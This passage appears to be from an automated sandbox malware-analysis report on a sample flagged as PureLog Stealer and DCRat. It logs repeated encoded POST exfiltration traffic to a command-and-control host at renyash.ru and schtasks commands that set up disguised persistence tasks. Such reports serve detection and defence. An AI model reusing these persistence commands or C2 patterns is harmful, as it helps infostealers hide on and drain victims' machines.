                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:51.945916891 CET2596OUTData Raw: 57 54 5d 5b 5b 5d 53 5c 5d 58 52 5a 56 5e 54 57 5f 53 58 44 59 5f 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WT][[]S\]XRZV^TW_SXDY_Q_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/>)<$)5(<#<(1=:X=:%3)X'X<2[</ ].#[(.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          63192.168.2.44991237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:52.588380098 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1904
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:52.946260929 CET1904OUTData Raw: 57 51 58 5f 5e 5a 53 5b 5d 58 52 5a 56 54 54 54 5f 59 58 48 59 5f 51 5d 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WQX_^ZS[]XRZVTTT_YXHY_Q]PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#^./:Z>7[>6%("<Y2:Y>&&6&?-?4.Z( ].#[(
                                                                                                                          Dec 26, 2024 22:33:53.947751999 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:54.204323053 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:51 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 5d 32 3d 02 5a 23 3f 24 5a 3c 39 0c 51 35 59 32 44 24 39 0a 07 29 2c 3d 02 2b 23 32 51 24 5c 3e 1c 22 01 34 1e 3f 31 33 58 29 0c 2b 59 01 1d 23 5a 24 15 24 59 33 03 29 10 2c 3f 2b 41 29 08 3e 5c 2a 3a 37 51 3e 15 00 00 23 1f 3a 18 2a 29 04 1e 2e 05 2d 1a 28 30 22 0f 26 3d 2c 51 02 11 38 1f 21 32 39 1c 36 11 19 0e 2a 55 3c 06 36 04 2c 51 31 03 07 1f 30 02 0c 5d 26 2c 3e 1f 27 09 2b 08 24 05 2d 1c 31 31 30 57 32 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: ']2=Z#?$Z<9Q5Y2D$9),=+#2Q$\>"4?13X)+Y#Z$$Y3),?+A)>\*:7Q>#:*).-(0"&=,Q8!296*U<6,Q10]&,>'+$-110W2? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.2.44991337.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:52.942904949 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:53.289803028 CET2596OUTData Raw: 52 50 5d 5f 5b 59 53 5b 5d 58 52 5a 56 54 54 56 5f 5d 58 46 59 5a 51 5b 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RP]_[YS[]XRZVTTV_]XFYZQ[PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/!*,8=(<5 &**%]&#)'9+7")/ ].#[(
                                                                                                                          Dec 26, 2024 22:33:54.306678057 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:54.560309887 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:52 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.2.44991937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:54.798904896 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:33:55.149146080 CET2592OUTData Raw: 52 53 58 59 5b 5c 56 58 5d 58 52 5a 56 5d 54 52 5f 58 58 41 59 55 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RSXY[\VX]XRZV]TR_XXAYUQ\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;/?,#^>-(=[4Y1&*:-1X01?'2+/ ].#[(&
                                                                                                                          Dec 26, 2024 22:33:56.202860117 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:56.412729025 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:54 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          66192.168.2.44992437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:56.657646894 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:57.008444071 CET2596OUTData Raw: 57 55 58 58 5b 51 53 5d 5d 58 52 5a 56 5f 54 56 5f 53 58 42 59 5d 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WUXX[QS]]XRZV_TV_SXBY]QRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /"\?,#_>5>+4$&=!>9%\& -[0Y2<79+ ].#[(*
                                                                                                                          Dec 26, 2024 22:33:58.019962072 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:33:58.272049904 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          67192.168.2.44992537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:58.649395943 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:59.008500099 CET2596OUTData Raw: 57 57 58 58 5e 5c 56 5a 5d 58 52 5a 56 58 54 5b 5f 53 58 46 59 5b 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WWXX^\VZ]XRZVXT[_SXFY[QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/2[)#^)5Z?<) /$&!(*5X10.$)<%?? ].#[(6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          68192.168.2.44993037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:59.333976030 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1892
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:59.680352926 CET1892OUTData Raw: 52 51 5d 5b 5b 5d 56 5c 5d 58 52 5a 56 5d 54 52 5f 52 58 41 59 5a 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RQ][[]V\]XRZV]TR_RXAYZQ\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#8>^>)5"+<Y4+'.1*:*%>0*+Q%( ].#[(&
                                                                                                                          Dec 26, 2024 22:34:00.695497036 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:34:00.948220968 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:58 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 14 27 3e 28 10 34 3c 20 58 3c 17 21 0f 22 11 0c 42 24 39 37 1d 2b 02 04 5f 2b 0d 36 13 33 04 31 09 22 11 3b 0f 2b 32 2c 04 3d 0c 2b 59 01 1d 20 06 30 05 3c 1e 27 14 3e 04 2c 3c 2f 43 3e 35 26 11 2a 00 3c 08 3f 3b 2a 05 20 1f 39 0a 3c 07 04 1e 39 3c 26 06 3f 30 0c 0f 24 2d 2c 51 02 11 3b 09 23 32 3a 0f 21 01 33 0c 28 33 23 10 21 29 33 08 31 3d 29 11 24 3c 2d 07 24 2c 21 05 30 0e 33 0c 30 15 22 0a 26 1c 0d 0f 26 05 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: ''>(4< X<!"B$97+_+631";+2,=+Y 0<'>,</C>5&*<?;* 9<9<&?0$-,Q;#2:!3(3#!)31=)$<-$,!030"&& ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          69192.168.2.44993137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:33:59.486620903 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:33:59.836636066 CET2592OUTData Raw: 57 50 58 5e 5b 50 56 5d 5d 58 52 5a 56 5d 54 54 5f 5e 58 40 59 5b 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WPX^[PV]]XRZV]TT_^X@Y[Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ .<1=,X?5!<?-7,#'-2]>*&V)Z$>+>Y+ ].#[(
                                                                                                                          Dec 26, 2024 22:34:00.855385065 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:34:01.108277082 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:33:58 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          70192.168.2.44993737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:34:01.408881903 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:34:01.758457899 CET2596OUTData Raw: 57 52 58 5e 5e 5f 56 5a 5d 58 52 5a 56 58 54 5b 5f 59 58 41 59 5c 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WRX^^_VZ]XRZVXT[_YXAY\QRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8<&>=%^<5X7/'&:>&' "0-=7&+ ].#[(6
                                                                                                                          Dec 26, 2024 22:34:02.771032095 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:34:03.024313927 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:34:00 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          71192.168.2.44993937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:34:03.266130924 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:34:03.621087074 CET2596OUTData Raw: 57 53 5d 5b 5b 50 56 5c 5d 58 52 5a 56 5f 54 57 5f 5e 58 47 59 5a 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WS][[PV\]XRZV_TW_^XGYZQXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /?==,7Z>5_+,5[",+%=*]*)&2)3?<$:X? ].#[(*
                                                                                                                          Dec 26, 2024 22:34:04.869204044 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:34:04.880166054 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:34:02 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:16:31:56
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                                          Imagebase:0x330000
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5 hash:6310493F1EAE60F8F1375EB05341A7D7
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1658435835.0000000000332000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:16:32:02
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:16:32:02
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline"
                                                                                                                          Imagebase:0x7ff68be40000
                                                                                                                          File size:2'759'232 bytes
                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FF9.tmp" "c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP"
                                                                                                                          Imagebase:0x7ff7fa7a0000
                                                                                                                          File size:52'744 bytes
                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:16:32:03
                                                                                                                          Start date:26/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
